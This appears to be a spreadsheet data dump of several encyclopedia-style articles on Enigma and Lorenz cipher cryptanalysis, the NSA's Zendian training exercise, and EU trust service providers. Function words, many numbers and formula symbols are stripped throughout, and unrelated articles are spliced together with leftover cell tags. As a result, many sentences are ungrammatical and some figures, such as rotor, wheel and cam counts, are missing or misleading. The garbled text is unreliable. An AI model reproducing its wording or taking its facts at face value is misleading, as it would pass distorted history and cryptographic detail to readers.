although letters cycle groups changed plugboard, number lengths cycles unaffected—in example above, cycle groups lengths described invariant structure characteristic indicator setting. there 105,456 possible rotor settings. poles therefore creating card catalog cycle patterns.the cycle-length method would avoid using grill. card catalog would index cycle-length starting positions (except turnovers occurred enciphering indicator). day's traffic would examined discover cycles permutations. card catalog would consulted find possible starting positions. there roughly million possible cycle-length combinations 105,456 starting positions. having found starting position, poles would enigma double determine cycles starting position without plugboard. poles would compare cycles cycles (unknown) plugboard solve plugboard permutation simple substitution cipher). then poles could find remaining secret ring settings method. problem compiling large card catalog. rejewski, 1934 1935, devised machine facilitate making catalog called cyclometer. this "comprised sets rotors... connected wires electric current could run. rotor second three letters phase respect rotor first set, whereas rotors second always rotors first set". preparation catalog, using cyclometer, was, said rejewski, "laborious took year, ready, obtaining daily keys question [some fifteen] minutes".however, november 1937, germans changed enigma reflector, necessitating production catalog—"a task [says rejewski] consumed, account greater experience, probably somewhat less year's time".this characteristics method stopped working german naval enigma messages 1937, indicator procedure changed involving special codebooks (see german navy 3-rotor enigma below). worse still, september 1938 stopped working german army force messages operators required choose grundstellung (initial rotor setting) message. although german army message keys would still double-enciphered, day's keys would double-enciphered initial setting, characteristic could longer found exploited. perforated sheets although characteristics method longer worked, inclusion enciphered message twice gave rise phenomenon cryptanalyst henryk zygalski able exploit. sometimes (about message eight) repeated letters message enciphered letter occasions. these occurrences called samiczki english, females—a term later used bletchley park).only limited number scrambler settings would give rise females, would identifiable card catalog. first letters ciphertext szvsik, would termed female; whoehs, female; aswcrw, female. method called netz (from netzverfahren, "net method"), zygalski sheet method used perforated sheets devised, although bletchley park zygalski's name used security reasons. about females day's messages required success. there sheets possible sequences wheel orders. each sheet left (slowest-moving) rotor. 51×51 matrices sheets represented possible starting positions middle right rotors. sheets contained 1000 holes positions female could occur. sheets day's messages would appropriately positioned perforated sheets apparatus. rejewski wrote device operated: when sheets superposed moved proper sequence proper manner respect other, accordance strictly defined program, number visible apertures gradually decreased. and, sufficient quantity data available, finally remained single aperture, probably corresponding right case, solution. from position aperture could calculate order rotors, setting rings, and, comparing letters cipher keys letters machine, likewise permutation words, entire cipher key. holes sheets painstakingly razor blades three months next major setback, sets sheets possible wheel orders produced. polish bomba after rejewski's characteristics method became useless, invented electro-mechanical device dubbed bomba kryptologiczna cryptologic bomb. each machine contained sets enigma rotors positions repeated three-letter key. like zygalski sheet method, bomba relied occurrence females, required three instead sheet method. bomby constructed, possible wheel orders. each bomba conducted exhaustive (brute-force) analysis 17,576 possible message keys. rejewski written device: bomb method, invented autumn 1938, consisted largely automation acceleration process reconstructing daily keys. each cryptologic bomb (six built warsaw biuro szyfrów cipher bureau september 1939) essentially constituted electrically powered aggregate enigmas. took place hundred workers shortened time obtaining hours. cipher message transmitted grundstellung clear, bomba found match, revealed rotor order, rotor positions, ring settings. remaining secret plugboard permutation. major setback december 1938, german army increased complexity enigma enciphering introducing additional rotors this increased number possible wheel orders poles could read small minority messages used neither rotors. they resources commission bombs produce sets zygalski sheets. other enigma users received rotors time. however, july 1939 sicherheitsdienst (sd)—the intelligence agency nazi party—continued machines indicator setting messages. this allowed rejewski reuse previous method, turn year worked wirings rotors. january 1939, germans increased number plugboard connections five eight seven ten, made methods decryption even difficult. rejewski wrote, 1979 critique appendix volume (1979), official history british intelligence second world war: quickly found [wirings] within [new rotors], [their] introduction raised number possible sequences [rotors] hence also raised tenfold work finding keys. thus change qualitative quantitative. would markedly increase personnel operate bombs, produce perforated sheets manipulate sheets. world polish disclosures likelihood increased 1939, britain france pledged support poland event action threatened independence. april, germany withdrew german–polish non-aggression pact january 1934. polish general staff, realizing likely happen, decided share work enigma decryption western allies. marian rejewski later wrote: [i]t harry hinsley suggested, cryptological] difficulties prompted work british french, deteriorating political situation. difficulties would still, even shared achievements allies contribution struggle germany. conference near warsaw july 1939, poles revealed french british broken enigma pledged give polish-reconstructed enigma, along details enigma-solving techniques equipment, including zygalski's perforated sheets rejewski's cryptologic bomb. return, british pledged prepare full sets zygalski sheets possible wheel orders. dilly knox member british delegation. commented fragility polish system's reliance repetition indicator, might moment cancelled". august polish enigma doubles sent paris, whence gustave bertrand took london, handing stewart menzies britain's secret intelligence service victoria station.gordon welchman, became head bletchley park, wrote: ultra would never gotten ground learned poles, nick time, details german military version commercial enigma machine, operating procedures use. peter calvocoressi, became head luftwaffe section wrote polish contribution: moot point is—how valuable? according best qualified judges accelerated breaking enigma perhaps year. british adopt polish techniques enlightened them. bruno september 1939 cipher bureau began preparations evacuate personnel equipment warsaw. soon special evacuation train, echelon transported eastward, south. time cipher bureau ordered cross border allied romania september, destroyed sensitive documents equipment single crowded truck. vehicle confiscated border romanian officer, separated military civilian personnel. taking advantage confusion, three mathematicians ignored romanian's instructions. they anticipated internment camp might identified romanian security police, german abwehr informers.the mathematicians went nearest railroad station, exchanged money, bought tickets, boarded first train headed south. after dozen hours, reached bucharest, romania. there went british embassy. told british "come back days", next tried french embassy, introducing "friends bolek" (bertrand's polish code name) asking speak french military officer. french army colonel telephoned paris issued instructions three poles assisted evacuating paris.on october 1939, bruno outside paris, polish cryptologists resumed work german enigma ciphers, collaboration bletchley park.pc bruno bletchley park worked together closely, communicating telegraph line secured enigma doubles. january 1940 alan turing spent several days bruno conferring polish colleagues. brought poles full zygalski sheets punched bletchley park john jeffreys using polish-supplied information, january 1940, poles made first break wartime enigma traffic—that october 1939. from time, fall france june 1940, percent enigma keys found allies, solved bruno.just opening 1940 offensive countries france, germans made feared change indicator procedure, discontinuing duplication enciphered message key. this meant zygalski sheet method longer worked. instead, cryptanalysts rely exploiting operator weaknesses described below, particularly cillies herivel tip. after june franco-german armistice, polish cryptological team resumed work france's southern free zone, although probably enigma. marian rejewski henryk zygalski, many travails, perilous journeys spanish imprisonment, finally made britain, inducted polish army work breaking german hand ciphers polish signals facility boxmoor. occupied france, thought risky invite work bletchley park.after german occupation vichy france, several worked bruno captured germans. despite dire circumstances held, none betrayed secret enigma's decryption. operating shortcomings apart less-than-ideal inherent characteristics enigma, practice system's greatest weakness used. basic principle sort enciphering machine deliver long stream transformations difficult cryptanalyst predict. some instructions operators, however, sloppy habits, opposite effect. without operating shortcomings, enigma would, almost certainly, broken.the shortcomings polish cryptanalysts exploited great effect included following: production early enigma training manual containing example plaintext genuine ciphertext, together relevant message key. when rejewski given december 1932, "made [his reconstruction enigma machine] somewhat easier". repetition message described rejewski's characteristics method, above. (this helped rejewski's solving enigma's wiring 1932, continued 1940.) repeatedly using stereotypical expressions messages, early example bletchley park would later term cribs. rejewski wrote "... relied fact greater number messages began letters anx—german "to", followed spacer". easily guessed keys bbb, sequences reflected layout enigma keyboard, "three [typing] keys stand next [o]r diagonally [from other]..." bletchley park occurrences called cillies. cillies operation four-rotor abwehr enigma included four-letter names german obscenities. sometimes, multi-part messages, operator would enter subsequent part message, merely leaving rotors previous part, become message next part. having three different rotors three positions scrambler. (this continued december 1938, increased five eight naval traffic 1940.) using plugboard leads, leaving letters unsteckered. (this continued january 1939 number leads increased, leaving small number letters unsteckered.)other useful shortcomings discovered british later american cryptanalysts included following, many depended frequent solving particular network: practice re-transmitting message identical, near-identical, form different cipher networks. message transmitted using low-level cipher bletchley park broke hand, enigma, decrypt provided excellent crib enigma decipherment. machines choice rotors slots them, rule networks stipulated rotor slot scrambler immediately preceding configuration. this reduced number wheel orders tried. allowing wheel order repeated monthly setting sheet. this meant keys found regular basis, economies excluding possible wheel orders could made. stipulation, force operators, letter connected plugboard neighbour alphabet. this reduced problem identifying plugboard connections automated bombes consecutive stecker knock-out (csko) device. sloppy practice john herivel anticipated soon arrival bletchley park january 1940. thought practical actions enigma operator would make, short cuts might employ. thought that, setting alphabet rings prescribed setting, closing lid, operator might turn rotors places selecting first part indicator. initially seem case, changes 1940, became known herivel proved useful. practice re-using columns wheel orders, ring settings plugboard connections previous months. resulting analytical short-cut christened bletchley park parkerismus parker, had, meticulous record-keeping, spotted phenomenon. re-use permutation german force meteo code enigma stecker permutation day. mavis lever, member dilly knox's team, recalled occasion extraordinary message. snag enigma course fact press every letter picked message and—one used looking things making instant decisions—i thought: 'something's gone. what chap done? there single message.' chap told send dummy message [cigarette] pressed last keyboard, letter come out. biggest crib ever had, encypherment llll, right message gave wiring wheel [rotor]. that's sort thing trained instinctively look something gone wrong someone done something silly torn rule book. postwar debriefings german cryptographic specialists, conducted part project ticom, tend support view germans well aware un-steckered enigma theoretically solvable, thought steckered enigma solved. crib-based decryption term crib used bletchley park denote known plaintext suspected plaintext point enciphered message. britain's government code cipher school (gc&amp;cs), move bletchley park, realised value recruiting mathematicians logicians work codebreaking teams. alan turing, cambridge university mathematician interest cryptology machines implementing logical operations—and regarded many genius—had started work gc&amp;cs part-time basis time munich crisis 1938. gordon welchman, another cambridge mathematician, also received initial training 1938, reported bletchley park september 1939, britain declared germany. most polish success relied repetition within indicator. soon turing moved bletchley park—where initially joined dilly knox research section—he seeking methods rely weakness, correctly anticipated german army force might follow german navy improving indicator system. poles used early form crib-based decryption days leads used plugboard. technique became known forty weepy weepy method following reason. when message continuation previous one, plaintext would start fort (from fortsetzung, meaning "continuation") followed time first message given twice bracketed letter time numerals represented letters enigma keyboard. "continuation message sent 2330" represented fortyweepyyweepy. cribs fundamental british approach solving enigma keys, guessing plaintext message highly skilled business. 1940 stuart milner-barry special crib room 8.foremost amongst knowledge needed identifying cribs text previous decrypts. bletchley park maintained detailed indexes m</t>
  </si>
  <si>
    <t>Zendian problem</t>
  </si>
  <si>
    <t>zendian problem exercise communication intelligence operations (mainly traffic analysis cryptanalysis) devised lambros callimahos part advanced course, ca-400, callimahos taught national security agency cryptanalysts starting 1950s. content scenario involves radio messages said intercepted december army contingent united nations force landed fictional island zendia pacific ocean. typical intercept looks like this: 4235kcs 230620t usm-99/00091 9516 8123 0605 7932 8423 5095 8444 6831 jaaaj euebd oetdn gxawr suteu eiwen yuenn odeuh rromm eelge aegid tesrr raseb enors rnomm eaytu neont esfrs ntcro qceet ocore iitlp ohsrg ssely tccsv sotiu gntiv evomn tmpaa circs enren otsoi enrei ekeio pfrnt cdoge nyfpe tesni eacea istem sofea trose eqoao oscer httaa luouy lsaie tserr esepa phvdn hnnti iartx lasld uratt opplo aitmw otias tnhir dcout nmfca sreee ussds dhoah reexi prout ntthd jaaaj euebd message, first line provided intercept operator, giving call signs, frequency, time, reference number. rest message transcript morse code transmission. beginning intercepted message header consists four-digit groups. initially, meaning numeric header known; meanings various components header (such serial number assigned transmitting organization's message center) worked traffic analysis. rest message consists "indicators" ciphertext; first group evidently "discriminant" indicating cryptosystem used, (depending cryptosystem) second group contain message-specific keying element initial rotor settings. first groups repeated message, allows correction garbled indicators. remaining characters encrypted text. since transmissions always complete groups, "nulls" used text. cryptosystems employed include transposition, dinome, rotor-based ciphers one-part code. while successfully tackled without computer, solution easy. practical exercise reinforces many basic principles, including ways exploit collection message traffic. certain amount plaintext inter-operator "chatter" also provided, help analysis. headers discriminants also given intercepts next three days; used traffic analysis determining daily operating procedures. availability zendian problem declassified available either part military cryptanalytics book itself. both published reprints aegean park press, walnut creek, usa. there small differences ciphertext sources, neither entirely error-free; indeed, errors intentional, dealing part learning process. karl heinz-everts' site provides link downloadable archive "intercepts." (the site also provides analysis partial solutions, viewed anyone wishing learn working exercise.) dundee society cryptanalists successfully finished ca-400 became members dundee society. this society founded lambros callimahos named empty dundee marmalade desk, disclose society's real purpose. zendia large print showing fictional nation zendia hangs wall library national cryptologic museum, operated nsa. copies map, shrunken degree feature labels illegible, appear previously cited books. also traffic analysis dundee society national cryptologic museum references external links aegean park press reprinted books containing zendian problem, training material. partial solutions zendian problem. anyone intending learn working exercise look solutions. zoomable maps republic zendia geographicus rare antique maps.</t>
  </si>
  <si>
    <t>Trust service provider</t>
  </si>
  <si>
    <t>trust service provider (tsp) person legal entity providing preserving digital certificates create validate electronic signatures authenticate signatories well websites general. trust service providers qualified certificate authorities required european union switzerland context regulated electronic signing procedures. history term trust service provider coined european parliament european council important relevant authority providing non-repudiation regulated electronic signing procedure. first brought electronic signatures directive 1999/93/ec initially named certification-service provider. directive repealed eidas regulation became official july 2016. regulation binding legislative requires member states follow. description trust service provider responsibility assure integrity electronic identification signatories services strong mechanisms authentication, electronic signatures digital certificates. eidas defines standards trust service providers perform services authentication non-repudiation. regulation provides guidance member states trust service providers shall regulated recognized. trust service defined electronic service entails three possible actions. first concern creation, verification validation electronic signatures, well time stamps seals, electronically registered delivery services certifications required services. second action entails creation, verification well validation certificates used authenticate websites. third action preservation electronic signatures, seals related certificates. elevated level qualified trust service, service must meet requirements eidas regulation. trust services provide trust framework facilitates continued relations electronic transactions conducted participating member states organizations. role qualified trust service provider qualified trust service provider plays important role process qualified electronic signing. trust service providers must given qualified status permission supervisory government body provide qualified digital certificates used create qualified electronic signatures. eidas requires maintain trust list lists providers services received qualified status. trust service provider entitled provide qualified trust services trust list.trust service providers trust list required follow strict guidelines established eidas. they need provide stamps valid time date, creating certificates. signatures expired certificates need revoked immediately. obliges trust service providers deliver appropriate training personnel employed trust service provider. they shall provide tools software hardware trustworthy capable preventing forgeries certificates produced. vision major intents eidas facilitate public business services, especially conducted parties across member state borders. these transactions safely expedited means electronic signing services provided trust service providers regards ensuring integrity signatures. member states required eidas establish “points single contact” (pscs) trust services ensure electronic schemes used cross-board public sector transactions, including exchange access healthcare information across borders. legal perspective electronic signatures created trust service providers while advanced electronic signature legally binding eidas, qualified electronic signature created qualified trust service provider carries higher probative value used evidence court. because signature's authorship considered non-repudiable, authenticity signature cannot easily challenged. member states obligated accept qualified electronic signatures created qualified certificate member states valid. according eidas regulation, i.e. article (2), signature created qualified certificate legal value handwritten signature court.the standards evolving. additional standards including policy definitions trust service providers development european telecommunication standards institute etsi. global perspective swiss digital signing standard zertes defined comparable concept certificate service providers. certificate service providers need audited conformity assessment bodies appointed schweizerische akkreditierungsstelle. united states nist digital signature standard (dss) current release know anything comparable qualified trust service provider would allow enhance non-repudiation signatory's qualified certificate. however authors forthcoming review commentators publicly discussing amendment similar eidas zertes approach trusted service provision. allow stringent non-repudiable global transactions legal relevance, international harmonization would required. controversy several research institutes associations expressed concern respect establishment small group centralized trust service providers country authenticate digital transactions. they state construct negative impact privacy. given central role trust service providers many transactions, council european professional informatics societies (cepis) fears trust service providers would gain collect information distinguishing attributes citizens, subject authentication. with regard requirement preserve data resulting expected efforts keep evidence potential liability requests inaccurate cepis sees risk trust service providers could create store entries authentication processes. information gained allows monitoring profiling involved citizens. transaction counterpart also identifies himself, user interests communication behaviour additionally sharpen profiles gained. data analysis would allow far-reaching insights citizens' privacy relationships. direct connection qualifying governmental bodies could allow gain access gained data profiles.another publication claims truly take advantage secure seamless cross-border electronic transactions, assurance levels, definitions technical deployment need specified precisely.in 2021, relatively vague proposed updates eidas would require browsers pass assurances tsps users. this would apparently involve incorporation government-specified tsps parallel existing multi-stakeholder processes used browsers establish trust certificate authorities. internet society mozilla asserted variety issues proposals. references</t>
  </si>
  <si>
    <t>Cryptanalysis of the Lorenz cipher</t>
  </si>
  <si>
    <t>cryptanalysis lorenz cipher process enabled british read high-level german army messages world british government code cypher school (gc&amp;cs) bletchley park decrypted many communications oberkommando wehrmacht (okw, german high command) berlin army commands throughout occupied europe, signed "adolf hitler, führer". these intercepted non-morse radio transmissions enciphered lorenz teleprinter rotor stream cipher attachments. decrypts traffic became important source "ultra" intelligence, contributed significantly allied victory.for high-level secret messages, german armed services enciphered character using various online geheimschreiber (secret writer) stream cipher machines ends telegraph link using 5-bit international telegraphy alphabet (ita2). these machines subsequently discovered lorenz schlüssel-zusatz, meaning "cipher attachment") army, siemens halske force siemens t43, little used never broken allies.bletchley park decrypts messages enciphered enigma machines revealed germans called wireless teleprinter transmission systems "sägefisch" (sawfish), british cryptographers refer encrypted german radiotelegraphic traffic "fish". "tunny" (tunafish) name given first non-morse link, subsequently used cipher machines traffic.as entirely separate cryptanalysis enigma, german operational shortcomings allowed initial diagnosis system, decryption. unlike enigma, physical machine reached allied hands europe, long wholesale decryption established. problems decrypting tunny messages development "colossus", world's first electronic, programmable digital computer, war, time selected tunny messages decrypted bletchley park.albert small, cryptanalyst army signal corps seconded bletchley park worked tunny, said december 1944 report back arlington hall that: daily solutions fish messages gc&amp;cs reflect background british mathematical genius, superb engineering ability, solid common sense. each necessary factor. each could overemphasised underemphasised detriment solutions; remarkable fact fusion elements apparently perfect proportion. result outstanding contribution cryptanalytic science. german tunny machines lorenz cipher attachments implemented vernam stream cipher, using complex array twelve wheels delivered cryptographically secure pseudorandom number stream. stream combined plaintext produce ciphertext transmitting using exclusive (xor) function. receiving end, identically configured machine produced stream combined ciphertext produce plaintext, system implemented symmetric-key algorithm. stream generated twelve wheels. this product xor-ing 5-bit character generated right hand five wheels, {\displaystyle \chi wheels, left hand five, {\displaystyle \psi wheels. wheels always moved position every incoming ciphertext character, wheels not. central {\displaystyle "motor" wheels determined whether wheels rotated character. after letter enciphered either five wheels moved remained still letter psi-key used again. like wheels, {\displaystyle wheel moved character. when {\displaystyle active position generated (before moving) {\displaystyle moved once: inactive position (before moving) {\displaystyle wheels stayed still. earliest machines, additional factor played moving wheels. these four different types called "limitations" bletchley park. involved aspect previous positions machine's wheels.the numbers cams twelve wheels sz42 machines totalled co-prime other, giving extremely long period sequence repeated. each could either raised position, case contributed logic system, reversing value bit, lowered position, case generated total possible number patterns raised cams 2501 astronomically large number. practice, however, half cams wheel raised position. later, germans realized number raised cams close would runs cryptographic weakness.the process working cams raised position called "wheel breaking" bletchley park. deriving start positions wheels particular transmission termed "wheel setting" simply "setting". fact wheels moved together, every input character, major weakness machines contributed british cryptanalytical success. secure telegraphy electro-mechanical telegraphy developed 1830s 1840s, well telephony, operated worldwide time second world war. extensive system cables linked sites within countries, standard voltage indicating "mark" indicating "space". where cable transmission became impracticable inconvenient, mobile german army units, radio transmission used. teleprinters circuit consisted keyboard printing mechanism, often five-hole perforated paper-tape reading punching mechanism. when used online, pressing alphabet transmitting caused relevant character print receiving end. commonly, however, communication system involved transmitting operator preparing messages offline punching onto paper tape, going online transmission messages recorded tape. system would typically send characters second, occupy line radio channel shorter period time online typing. characters message represented codes international telegraphy alphabet (ita2). transmission medium, either wire radio, used asynchronous serial communication character signaled start (space) impulse, data impulses stop (mark) impulses. bletchley park mark impulses signified ("cross") space impulses ("dot"). example, letter would coded ••x•x. figure shift (figs) letter shift (letrs) characters determined receiving interpreted string characters next shift character. because danger shift character corrupted, operators would type pair shift characters changing letters numbers vice versa. would type 55m88 represent full stop. such doubling characters helpful statistical cryptanalysis used bletchley park. after encipherment, shift characters special meaning. speed transmission radio-telegraph message three four times morse code human listener could interpret standard teleprinter, however would produce text message. lorenz cipher attachment changed plaintext message ciphertext uninterpretable without identical machine identically this challenge faced bletchley park codebreakers. interception intercepting tunny transmissions presented substantial problems. transmitters directional, signals quite weak receivers britain. furthermore, different frequencies used transmissions, frequency would sometimes changed part through. after initial discovery non-morse signals 1940, radio intercept station called foreign office research development establishment hill farm knockholt kent, specifically intercept traffic. centre headed harold kenworthy, receiving sets employed staff. became fully operational early 1943. because single missed corrupted character could make decryption impossible, greatest accuracy required. undulator technology used record impulses originally developed high-speed morse. produced visible record impulses narrow paper tape. this read people employed "slip readers" interpreted peaks troughs marks spaces ita2 characters. perforated paper tape produced telegraphic transmission bletchley park punched out. vernam cipher vernam cipher implemented lorenz machines utilizes boolean "exclusive (xor) function, symbolised verbalised both". this represented following truth table, represents "true" represents "false". other names function are: exclusive disjunction, equal (neq), modulo addition (without "carry") subtraction (without "borrow"). modulo addition subtraction identical. some descriptions tunny decryption refer addition differencing, i.e. subtraction, mean thing. operator associative commutative. reciprocity desirable feature machine cipher machine settings used either enciphering deciphering. vernam cipher achieves this, combining stream plaintext characters stream produces ciphertext, combining ciphertext regenerates plaintext.symbolically: plaintext ciphertextand ciphertext plaintext vernam's original idea conventional telegraphy practice, paper tape plaintext combined paper tape transmitting end, identical tape combined ciphertext signal receiving end. each pair tapes would unique one-time tape), generating distributing tapes presented considerable practical difficulties. 1920s four different countries invented rotor vernam cipher machines produce stream instead tape. lorenz sz40/42 these. security features monoalphabetic substitution cipher caesar cipher easily broken, given reasonable amount ciphertext. this achieved frequency analysis different letters ciphertext, comparing result known letter frequency distribution plaintext.with polyalphabetic cipher, different substitution alphabet successive character. frequency analysis shows approximately uniform distribution, obtained (pseudo) random number generator. however, lorenz wheels turned every character not, machine disguise pattern adjacent characters german plaintext. alan turing discovered weakness invented differencing technique described exploit it.the pattern cams raised position, lowered position changed daily motor wheels {\displaystyle {\displaystyle 61). wheel patterns initially changed monthly. wheel patterns changed quarterly october 1942 frequency increased monthly, daily august 1944, frequency changing wheel patterns also changed daily.the number start positions wheels 43×47×51×53×59×37×61×41×31×29×26×23 approximately 1.6×1019 billion billion), large number cryptanalysts exhaustive "brute-force attack". sometimes lorenz operators disobeyed instructions messages transmitted start positions, phenomenon termed "depth". method transmitting operator told receiving operator wheel settings chosen message transmit termed "indicator" bletchley park. august 1942, formulaic starts messages, useful cryptanalysts, replaced irrelevant text, made identifying true message somewhat harder. this material dubbed quatsch (german "nonsense") bletchley park.during phase experimental transmissions, indicator consisted twelve german forenames, initial letters indicated position operators turned twelve wheels. well showing transmissions fully depth, also allowed identification partial depths indicators differed wheel positions. from october 1942 indicator system changed sending operator transmitting unenciphered letters followed digit number. this number taken serially code book issued operators gave, number, settings twelve wheels. books replaced used replacements, complete depths could identified re-use number particular tunny link. diagnosis first step breaking cipher diagnose logic processes encryption decryption. case machine cipher tunny, entailed establishing logical structure hence functioning machine. this achieved without benefit seeing machine—which happened 1945, shortly allied victory europe. enciphering system good ensuring ciphertext contained statistical, periodic linguistic characteristics distinguish random. however apply weakness meant tunny keys could solved.during experimental period tunny transmissions twelve-letter indicator system use, john tiltman, bletchley park's veteran remarkably gifted cryptanalyst, studied tunny ciphertexts identified used vernam cipher. when transmissions key, i.e. depth, combining eliminates effect key. call ciphertexts plaintexts have: pbif plaintexts worked out, recovered either ciphertext-plaintext pair e.g.: august 1941, long messages received indicator hqibpexezmug. first seven characters ciphertexts same, second message shorter. first characters messages follows bletchley park interpretation): john tiltman tried various likely pieces plaintext, i.e. "cribs", string found first plaintext message started german word spruchnummer (message number). second plaintext, operator used common abbreviation nummer. there abbreviations second message, punctuation sometimes differed. this allowed tiltman work out, days, plaintext messages, sequence plaintext characters discovered could tried vice versa. turn, yielded almost 4000 characters key.members research section worked derive mathematical description generating process, without success. bill tutte joined section october 1941 given task. read chemistry mathematics trinity college, cambridge recruited bletchley park. training course, taught kasiski examination technique writing squared paper defined number characters suspected frequency repetition key. number correct, columns matrix would show repetitions sequences characters chance alone. tutte thought possible that, rather using technique whole letters key, likely long frequency repetition, might worth trying sequence formed taking impulse (bit) letter, grounds "the part might cryptographically simpler whole". given tunny indicators used letters (excluding positions, letters twelfth, tried kasiski's technique first impulse characters using repetition 575. this produce large number repetitions columns, tutte observe phenomenon diagonal. therefore tried 574, showed repeats columns. recognising prime factors number tried period "got rectangle dots crosses replete repetitions".it clear, however, sequence first impulses complicated produced single wheel positions. tutte called component (chi). figured another component, xor-ed this, always change character, product wheel called (psi). applied five impulses—indicated subscripts. single character, consisted components: ψ.the actual sequence characters added wheels, including advance, referred extended psi, symbolised ψ′.tutte's derivation component made possible fact dots likely followed dots, crosses likely followed crosses. this product weakness german setting, later stopped. once tutte made breakthrough, rest research section joined study impulses, established five wheels moved together control "motor") wheels. diagnosing functioning tunny machine truly remarkable cryptanalytical achievement, described tutte inducted officer order canada october 2001, "one greatest intellectual feats world ii". turingery july 1942 alan turing spent weeks research section. become interested problem breaking tunny keys obtained depths. july, developed method deriving settings ("wheel breaking") length key. became known "turingery" (playfully dubbed "turingismus" peter ericsson, peter hilton donald michie) introduced important method "differencing" much rest solving tunny keys absence depths, based. differencing search process would manipulate ciphertext produce frequency distribution characters departed uniformity enciphering process aimed achieve. turing worked combination values successive (adjacent) characters stream ciphertext key, emphasised departures uniform distribution. resultant stream called difference (symbolised greek letter "delta" modulo subtraction. stream characters difference obtained follows, underline indicates succeeding character: sthe stream ciphertext plaintext either components relationship amongst elements still applies differenced. example, well case that: δψsimilarly ciphertext, plaintext components: δψso: δψthe reason differencing provided tunny, although frequency distribution characters ciphertext could distinguished random stream, true version ciphertext element removed. this because, plaintext contained repeated character wheels move differenced character (δψ) would null character ('/' bletchley park). when xor-ed character, character effect, circumstances, ciphertext modified removal component called de-chi bletchley park, process removing "de-chi-ing". similarly removal component known "de-psi-ing" "deep sighing" particularly difficult).so delta de-chi was: δχrepeated characters plaintext frequent characteristics german (ee, relatively common), telegraphists frequently repeated figures-shift letters-shift characters loss ordinary telegraph transmission could lead gibberish. quote general report tunny:turingery introduced principle differenced one, called could yield information unobtainable ordinary key. this principle fundamental basis nearly statistical methods wheel-breaking setting. differencing applied impulses ita2 coded characters. first impulse, enciphered wheels differenced one: k1and second impulse: k2and periodicity wheels impulse respectively first impulse) also reflected pattern however, given wheels advance every input character, wheels, simply repetition pattern every 1763 characters δk1, complex sequence. turing's method turing's method deriving settings wheels length obtained depth, involved iterative process. given delta character null character half time average, assumption chance correct. process started treating particular character position. resulting putative pattern wheel, recorded sheet paper contained many columns characters key, five rows representing five impulses given knowledge tutte's work, periodicity wheels, allowed propagation values appropriate positions rest key. five sheets, wheels, also prepared. these contained columns corresponding number cams appropriate wheel, referred 'cage'. cage columns. successive 'guesses' values produced putative state values. these might either agree disagree previous assumptions, count agreements disagreements made sheets. where disagreements substantially outweighed agreements, assumption made character null character '/', relevant assumption discounted. progressively, settings wheels deduced, them, motor wheel settings. experience method developed, improvements made allowed used much shorter lengths original characters." testery testery section bletchley park performed bulk work involved decrypting tunny messages. july 1942, volume traffic building considerably. section therefore ralph tester—hence name. staff consisted mainly ex-members research section, included peter ericsson, peter hilton, denis oswald jerry roberts. testery's methods almost entirely manual, introduction automated methods newmanry supplement speed work.the first phase work testery july october, predominant method decryption based depths partial depths. after days, however, formulaic start messages replaced nonsensical quatsch, making decryption difficult. this period productive nonetheless, even though decryption took considerable time. finally, september, depth received allowed turing's method wheel breaking, "turingery", used, leading ability start reading current traffic. extensive data statistical characteristics language messages compiled, collection cribs extended.in late october 1942 original, experimental tunny link closed links (codfish octopus) opened. with subsequent links, 12-letter indicator system specifying message replaced system. this meant full depths could recognised—from identical numbers—which considerable reduction traffic decrypted. once newmanry became operational june 1943, nature work performed testery changed, decrypts, wheel breaking longer relying depths. british tunny so-called "british tunny machine" device exactly replicated functions sz40/42 machines. used produce german cleartext ciphertext tape, settings determined. functional design produced bletchley park testery tunnies war. designed built tommy flowers' laboratory general post office research station dollis hill hayward, "doc" coombs, bill chandler broadhurst. mainly built standard british telephone exchange electro-mechanical equipment relays uniselectors. input output means teleprinter paper tape reading punching. these machines used testery later newmanry. dorothy boisson machine operator member women's royal naval service (wren), described plugging settings like operating fashioned telephone exchange received electric shocks process.when flowers invited hayward first british tunny machine dollis hill typing standard test phrase: "now time good come party", much appreciated rotor functions provide following wordsworthian output: additional features added british tunnies simplify operation. further refinements made versions used newmanry, third tunny equipped produce de-chi tapes. newmanry newmanry section newman december 1942 look possibility assisting work testery automating parts processes decrypting tunny messages. newman working gerry morgan, head research section ways breaking tunny bill tutte approached november 1942 idea became known "1+2 break in". this recognised feasible, automated. newman produced functional specification become "heath robinson" machine. recruited post office research station dollis hill, c.e. wynn-williams telecommunications research establishment (tre) malvern implement idea. work engineering design started january 1943 first machine delivered june. staff time consisted newman, donald michie, jack good, engineers wrens. newmanry contained three robinson machines, colossus computers number british tunnies. staff cryptographers, engineers wrens.the automation processes required processing large quantities punched paper tape enciphered messages received. absolute accuracy tapes transcription essential, single character error could invalidate corrupt huge amount work. jack good introduced maxim checked wrong". "1+2 break tutte developed exploiting non-uniformity bigrams (adjacent letters) german plaintext using differenced cyphertext components. method called "1+2 break in," "double-delta attack". essence method find initial settings component exhaustively trying positions combination ciphertext, looking evidence non-uniformity reflected characteristics original plaintext. wheel breaking process successfully produced current settings allow relevant sequence characters wheels generated. totally impracticable generate million characters five wheels, initially limited 1271 first two. given five impulses piand hence ψifor first impulses: ψ2)calculating putative starting point sequence would yield with, long run, greater proportion correct starting point used. tutte knew, however, using differenced values amplified effect repeated characters plaintext would always generate similarly would generate whenever wheels move half time overall. tutte analyzed decrypted ciphertext differenced version function: (∆z1 ∆z2) (∆χ1 ∆χ2) (∆ψ1 ∆ψ2)and found generated time. given nature contribution wheels, alignment chi-stream ciphertext gave highest count (∆z1 ∆χ2) likely correct. this technique could applied pair impulses provided basis automated approach obtaining de-chi ciphertext, component could removed manual methods. robinsons heath robinson first machine produced automate tutte's method. given name wrens operated cartoonist william heath robinson, drew immensely complicated mechanical devices simple tasks, similar american cartoonist rube goldberg. functional specification machine produced newman. main engineering design work frank morrell post office research station dollis hill north london, colleague tommy flowers designing "combining unit". wynn-williams telecommunications research establishment malvern produced high-speed electronic valve relay counters. construction started january 1943, prototype machine bletchley park june.the main parts machine were: tape transport reading mechanism (dubbed "bedstead" resemblance upended metal frame) looped message tapes 1000 2000 characters second; combining unit implemented logic tutte's method; counting unit counted number exceeded pre-set total, displayed printed it.the prototype machine effective despite number serious shortcomings. most progressively overcome development became known "old robinson". colossus tommy flowers' experience heath robinson, previous, unique experience thermionic valves (vacuum tubes) realize better machine could produced using electronics. instead stream read punched paper tape, electronically generated stream could allow much faster flexible processing. flowers' suggestion could achieved machine entirely electronic would contain thousand valves, treated incredulity telecommunications research establishment bletchley park, thought would "too unreliable useful work". did, however, support controller research dollis hill, gordon radley, implemented ideas producing colossus, world's first electronic, digital, computing machine programmable, remarkably short time months. assisted colleagues post office research station dollis hill: sidney broadhurst, william chandler, allen coombs harry fensom. prototype mark colossus 